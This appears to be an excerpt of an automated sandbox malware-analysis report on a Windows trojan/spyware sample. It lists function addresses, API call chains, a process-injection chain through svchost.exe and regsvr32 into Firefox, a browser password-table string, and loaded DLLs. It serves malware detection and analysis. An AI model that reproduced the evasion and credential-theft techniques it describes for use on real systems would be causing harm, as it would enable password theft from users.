Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004037E00_2_004037E0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004278590_2_00427859
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004128180_2_00412818
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0040F8900_2_0040F890
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0042397B0_2_0042397B
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00409A400_2_00409A40
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00411B630_2_00411B63
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0047CBF00_2_0047CBF0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0044EBBC0_2_0044EBBC
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00412C380_2_00412C38
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0044ED9A0_2_0044ED9A
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00423EBF0_2_00423EBF
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00424F700_2_00424F70
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0041AF0D0_2_0041AF0D
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_040036180_2_04003618
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003985232_2_00398523
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0038E0732_2_0038E073
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003830602_2_00383060
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003811F02_2_003811F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003AEAA32_2_003AEAA3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00382B602_2_00382B60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00382B5C2_2_00382B5C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003823B02_2_003823B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0038FDD32_2_0038FDD3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003967732_2_00396773
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039676E2_2_0039676E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0038FFF32_2_0038FFF3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A1E4F65_2_04A1E4F6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A144205_2_04A14420
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A224465_2_04A22446
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A305915_2_04A30591
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049705355_2_04970535
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0498C6E05_2_0498C6E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0496C7C05_2_0496C7C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049947505_2_04994750
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049707705_2_04970770
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A020005_2_04A02000
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A241A25_2_04A241A2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A301AA5_2_04A301AA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A281CC5_2_04A281CC
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049601005_2_04960100
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A0A1185_2_04A0A118
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049F81585_2_049F8158
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049F02C05_2_049F02C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A102745_2_04A10274
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A303E65_2_04A303E6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0497E3F05_2_0497E3F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2A3525_2_04A2A352
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A10CB55_2_04A10CB5
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04960CF25_2_04960CF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04970C005_2_04970C00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04988DBF5_2_04988DBF
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0496ADE05_2_0496ADE0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0497AD005_2_0497AD00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A0CD1F5_2_04A0CD1F
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04982E905_2_04982E90
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2CE935_2_04A2CE93
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2EEDB5_2_04A2EEDB
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2EE265_2_04A2EE26
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04970E595_2_04970E59
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049EEFA05_2_049EEFA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04962FC85_2_04962FC8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0497CFE05_2_0497CFE0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A12F305_2_04A12F30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04990F305_2_04990F30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049B2F285_2_049B2F28
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049E4F405_2_049E4F40
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049568B85_2_049568B8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0499E8F05_2_0499E8F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049728405_2_04972840
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0497A8405_2_0497A840
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A3A9A65_2_04A3A9A6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049729A05_2_049729A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049869625_2_04986962
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0496EA805_2_0496EA80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A26BD75_2_04A26BD7
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2AB405_2_04A2AB40
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2F43F5_2_04A2F43F
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049614605_2_04961460
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A0D5B05_2_04A0D5B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A395C35_2_04A395C3
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A275715_2_04A27571
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A216CC5_2_04A216CC
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049B56305_2_049B5630
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2F7B05_2_04A2F7B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2F0E05_2_04A2F0E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A270E95_2_04A270E9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049770C05_2_049770C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A1F0CC5_2_04A1F0CC
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0497B1B05_2_0497B1B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A3B16B5_2_04A3B16B
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0495F1725_2_0495F172
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A516C5_2_049A516C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049752A05_2_049752A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A112ED5_2_04A112ED
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0498B2C05_2_0498B2C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049B739A5_2_049B739A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2132D5_2_04A2132D
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0495D34C5_2_0495D34C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2FCF25_2_04A2FCF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049E9C325_2_049E9C32
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0498FDC05_2_0498FDC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A27D735_2_04A27D73
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04973D405_2_04973D40
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A21D5A5_2_04A21D5A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04979EB05_2_04979EB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04971F925_2_04971F92
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2FFB15_2_04A2FFB1
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2FF095_2_04A2FF09
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049738E05_2_049738E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049DD8005_2_049DD800
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A059105_2_04A05910
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049799505_2_04979950
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0498B9505_2_0498B950
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A11AA35_2_04A11AA3
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A0DAAC5_2_04A0DAAC
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049B5AA05_2_049B5AA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A1DAC65_2_04A1DAC6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A27A465_2_04A27A46
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2FA495_2_04A2FA49
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049E3A6C5_2_049E3A6C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0498FB805_2_0498FB80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049ADBF95_2_049ADBF9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049E5BF05_2_049E5BF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04A2FB765_2_04A2FB76
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF1BE05_2_02AF1BE0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AECAF05_2_02AECAF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AEAD905_2_02AEAD90
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AECD105_2_02AECD10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF52405_2_02AF5240
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02B0B7C05_2_02B0B7C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF348B5_2_02AF348B
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF34905_2_02AF3490
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0486E4245_2_0486E424
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0486E7BE5_2_0486E7BE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0486E3045_2_0486E304
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0486D8885_2_0486D888
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 268 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 96 times
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: String function: 00445975 appears 65 times
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: String function: 0041171A appears 37 times
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: String function: 0041718C appears 45 times
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: String function: 0040E6D0 appears 35 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 0495B970 appears 280 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 049B7E54 appears 111 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 049DEA12 appears 86 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 049A5130 appears 58 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 049EF290 appears 105 times
Source: LlbpXphTu9.exe, 00000000.00000003.2044861897.00000000047C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LlbpXphTu9.exe
Source: LlbpXphTu9.exe, 00000000.00000003.2042482792.000000000496D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs LlbpXphTu9.exe
Source: LlbpXphTu9.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/12
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
Source: C:\Users\user\Desktop\LlbpXphTu9.exeFile created: C:\Users\user\AppData\Local\Temp\teresJump to behavior
Source: LlbpXphTu9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LlbpXphTu9.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: regsvr32.exe, 00000005.00000002.4496934395.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4496934395.0000000002DD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4496934395.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.2525742514.0000000002DCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: LlbpXphTu9.exeReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\LlbpXphTu9.exeFile read: C:\Users\user\Desktop\LlbpXphTu9.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\LlbpXphTu9.exe "C:\Users\user\Desktop\LlbpXphTu9.exe"
Source: C:\Users\user\Desktop\LlbpXphTu9.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LlbpXphTu9.exe"
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\LlbpXphTu9.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LlbpXphTu9.exe"Jump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: version.dllJump to behavior
